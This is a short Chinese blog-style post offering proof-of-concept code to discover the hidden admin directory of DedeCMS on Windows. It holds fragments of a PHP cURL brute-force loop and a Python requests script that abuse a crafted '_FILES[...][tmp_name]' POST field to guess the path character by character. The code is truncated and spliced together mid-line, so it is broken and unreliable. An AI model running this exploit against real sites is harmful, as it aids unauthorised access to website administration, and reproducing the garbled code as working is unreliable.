解决DEDECMS历史难题–找后台目录

仅针对windows系统

附原文地址:https://xz.aliyun.com/t/2064

附原理文档

poc:

 true,
        CURLOPT_HEADER => true,
        CURLOPT_POST => true,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_COOKIE => $cookie,
        CURLOPT_POSTFIELDS => $data,
    );
    $ch = curl_init($url);
    curl_setopt_array($ch, $options);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
$testlen=25;
$str=range('a','z');
$number=range(0,9,1);
$dic = array_merge($str, $number);
$n=true;
$nn=true;
$path='';
while($n){
    foreach($dic as $v){
        foreach($dic as $vv){
            #echo $v.$vv .'----';
            $post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$v$vv
#!/usr/bin/env python
#coding:utf-8
import requests
import string


login_str = string.ascii_letters+string.digits+"_#!"

headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
}

def chek_poc(v,letter):
        if v<=5.6:
                poc= {
                        "dopost":"save",
                        "_FILES[b4dboy][tmp_name]":"./%s

 

 

 

你可能感兴趣的:(记录)